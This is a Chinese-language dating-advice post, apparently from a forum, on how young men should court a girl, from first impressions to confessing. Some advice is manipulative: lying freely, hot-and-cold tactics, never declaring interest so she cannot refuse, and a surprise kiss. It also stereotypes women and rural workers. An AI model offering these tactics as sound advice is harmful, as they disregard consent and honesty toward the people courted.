  一、应该给MM留下什么样的第一印象(时间:刚开始接触MM)

  1、我认为最关键的,是要让MM看到你的上进心。

  男人的最大魅力在于事业有成,年轻人工作时间不长谈不上“有成”,这时候你就要让MM觉得你是个有上进心的人。

  别的可以胡说八道,但这个问题不能含糊,你一定要告诉MM,你对未来充满信心,你不满足于现状,并且你已经有了长远的计划,总之你的未来不是梦。

  2、要显得有信心、有责任心

  不要像个小孩子,女孩子都很懒希望能找个依靠,你要拿出自己的信心和责任心来。

  有一个错的选择总比没有选择要好的多。

  3、不要太正经,但也不要太随便

  该正经的地方就正经,该调侃的的时候就调侃。

  女孩子都喜欢有点玩世不恭的男人,所以别显得对什么都特别在意,那样太呆板。

  4、显得成熟一点

  遇事镇定、从容不迫的男人对MM有致命的吸引力。

  二、如何与MM展开进一步接触(时间:开始追的阶段)

  1、这个阶段最关键的是不能着急,不要把事情弄的那么清楚,让人家一眼就能看出你在追人家。

  想一想,一般人都不会一眼就看上你,但也不会看一眼就讨厌你,都是老百姓家的孩子(除非你长得象周润发刘德华或者凯文科斯特纳),好感是需要随着了解的不断增加而实现的,所以问题的关键是你要得到进一步发展的机会。

  站在女孩子的角度替人家想一想:你这么直接了当的冲过来要搞对象,女孩子肯定有心理压力。这要是接触一阵后发现不喜欢你,那不就成了耍你了么?所以如果你开始就摆出志在必得的姿势出来,基本上会被立刻闷回去。

  2、要低姿态起步

  首先要把关系定位成“朋友”,本来是“普通朋友”,你希望成为“好朋友”,有品位的还可以要求对方成为“红颜知己”什么的,总之千万不要说“追你”。

  你想想,你如果根本不提“追”,那么女孩子也就更没机会“拒绝”你——你没追她怎么拒绝你?!

  这样可以减轻女孩子的心理压力,使你们能顺利的交往下去。不要幻想认识三天就答应嫁给你,要充分的交往、了解,感情不是凭空产生的。

  3、交往的过程中不要太急躁

  要有张有弛,不要整天缠着人家,谁这样对你,你也会腻。我有个好朋友对我说,追女孩子的关键是八个字——“忽冷忽热、欲擒故纵”(这是我同学多少年心血的结晶)。

  你整天缠着人家自然不觉得你好,你适当的冷个一两天,女孩子就会想起你在的好处了。

  还有就是不要拿出“非你不娶”的志气来,太掉价了不好,有时候可以耍点花招。

  4、要适当的创造机会

  前面说了,不要使事情立刻变成“你在追别人”,而你又需要得到接近女孩子的机会,这时就要看你的创造力了。

  你可以搜集情报,想办法把守株待兔变成一场邂逅;也可以装做漫不经心的找出最最充足的理由邀请对方和你一起做什么事。

  总之这个是最有技术含量的地方,实在不行可以找前辈请教。

  5、切忌切忌:随便送人家礼物是不礼貌的

  有些人追女孩子心切,喜欢经常买东西送人家,殊不知追女孩子最忌讳这个。

  俗话说“无功不受禄”,你这样送人家东西就是在施加压力,人家会觉得欠你的,所以会想办法还给你,如果没办法还给你就会想办法不和你交往,免得总是欠你人情。

  如果你想显示自己的诚意,倒不妨请女孩子一起消费,比如说找好的餐厅吃饭,或者找贵的地方一起玩什么的,女孩子自然能看出你花了很多钱,但钱终究是两个人一起花了而不是变成东西带回家。

  三、“女朋友”到底是什么?

  1、“女朋友”是一种事实,而不是一份承诺

  你和女孩子开始交往,从“普通朋友”变成“好朋友”,再到“非常非常好、无话不谈的朋友”,某一个阳光灿烂的午后,你“不小心”拉了她的手;“月上柳梢头”,你突然袭击吻了她。这时她就已经是你的女朋友了,无论她是否承认,她心理已经认为你是他男朋友了。

  我知道最高明的,直到上床了都没问过“你是否愿意做我女朋友”,最后还是女孩子急了:“你怎么还不求我做你女朋友啊!”

  所以说,千万不要急于把窗户纸捅破,情况越朦胧对你越有利。

  2、“表白”是什么?

  前面说了,表白实际上就是一个形式而已,正确的顺序应该是:事实上已经成为你女朋友了,你才能向人家表白,水到渠成。很多人弄不明白这个问题,总以为人家先答应做自己女朋友,然后再如何如何,我只能说非常非常“单纯”,也非常非常“愚蠢”。

  3、有没有“迫不得已非表白不可”的时候?

  有,比如说出现第三者,或者你和女孩子关系没有成熟但两个人可能分开一段时间。

  这时候的表白就是条件不成熟的表白,风险非常大,类似于下围棋的时候形势严峻,落後的一方迫于无奈放出“胜负手”,赢了就赢了,输了也只能说“倒霉都是天生的”。

  4、“爱”字不要轻易出口

  经常看见论坛出现“大胆的表白”,说实话我真的认为这是非常不成熟的一种表现。“爱”是一个神圣的字,意味着追求,也意味着承诺,甚至体现出一种责任。

  随便说“爱”的男人是不负责任的。

  四、文明恋爱,不可强求

  1、不是每个MM都能追到手的

  好女孩子总会有很多人追,不可能遂了每个人的心愿,总会有失败者。举个例子,就算你刻苦钻研掌握了最搞超的追MM原理,你一样追不上TWINS里的任何一个。

  换个角度考虑问题,一个小学没毕业的农村小保姆,即使对你再好,每个月赚600给你买700的礼物(透支),愿意为你“当牛做马”,你也不会爱上她。如果她每天哭哭啼啼的缠着,你肯定觉得烦。

  所以说爱情是需要物质基础的,至少需要平衡。

  2、追MM做是一种严肃的社会活动

  千万不要把人家搞烦了,要给自己留后路。大丈夫何患无妻?有些MM确实势利眼(少数),如果不服气,你可以发愤图强,用事实证明“她当时瞎了眼”,绝对不要误人误己。

  最后补充一点:

  ①千万不要在MM面前显得愤世嫉俗,愤世嫉俗有时候意味着“你很失败”。